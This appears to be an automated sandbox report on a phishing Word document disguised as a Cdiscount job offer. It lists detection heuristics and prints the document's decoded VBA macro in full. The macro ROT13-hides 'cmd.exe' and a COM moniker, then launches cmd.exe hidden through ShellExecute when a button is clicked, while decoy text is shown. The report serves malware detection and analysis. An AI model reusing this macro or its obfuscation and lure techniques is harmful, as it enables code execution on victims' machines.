Verdict: MALICIOUS (risk score 102)

Malware Insights

MITRE ATT&CK techniques:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros that use ShellExecute to launch a second-stage payload. The macro obfuscates the executable name as 'pzq.rkr' (ROT13-encoded; the macro's own A() routine decodes it to cmd.exe) and passes a similarly encoded, suspicious moniker string to a GetObject call. The document body presents a job offer to lure the user into interacting with the malicious content.
Heuristics (4)

- Reference to ShellExecute API (severity: high, rule SC_STR_SHELLEXEC): reference to the ShellExecute API.
- VBA macros detected (severity: medium, rule OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- GetObject call (severity: high, rule OLE_VBA_GETOBJ): GetObject call. Matched line in script:
  `Function yolo() Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880")) obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0`
- Embedded URL (severity: info, rule EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2255 bytes |

SHA-256: c69b280aeca38bad7163e1d2953f26541110919ee8224bfba1952936d4a54803
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"
Function A(Test$) As String
Dim tt As Long, x As Integer, y As Integer
For tt = 1 To Len(Test$)
y% = 0
x% = Asc(Mid$(Test$, tt, 1))
If (x% > 64 And x% < 91) Or (x% > 96 And x% < 123) Then
y% = 13
x% = x% - y%
If x% < 97 And x% > 83 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
End If
Mid$(Test$, tt, 1) = Chr$(x%)
Next tt
A = Test$
End Function
Function yolo()
Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
ActiveDocument.BuiltInDocumentProperties("category") = "1"
End Function
Private Sub CommandButton1_Click()
If ActiveDocument.BuiltInDocumentProperties("category") = "0" Then
yolo
End If
Selection.ParagraphFormat.Alignment = wdAlignParagraphLeft
Selection.Font.Size = 11
Selection.TypeText Text:="Vous l'aurez peut-être découvert, mais il s'agit de Cdiscount. Le poste est disponible à Bordeaux ou Paris. Selon profile le télétravail est possible avec déplacement occasionnel dans les locaux (à minima 2 jours par quinzaine)."
Selection.TypeParagraph
Selection.TypeText Text:="En plus du salaire très attractif, vous bénéficierez d'une excellente mutuelle, d'une crèche d'entreprise et de tarifs préférentiels sur l'ensemble des plateformes Cdiscount."
Selection.TypeParagraph
Selection.Font.Bold = True
Selection.ParagraphFormat.Alignment = 1
Selection.TypeText Text:="Cdiscount est bien + que vous ne le croyez : venez grandir avec nos équipes d'experts, cultiver votre talent et révolutionner le e-commerce tout en partageant les valeurs qui font notre force !"
ActiveDocument.Shapes("Picture 1").Select
Selection.ShapeRange.Delete
End Sub
```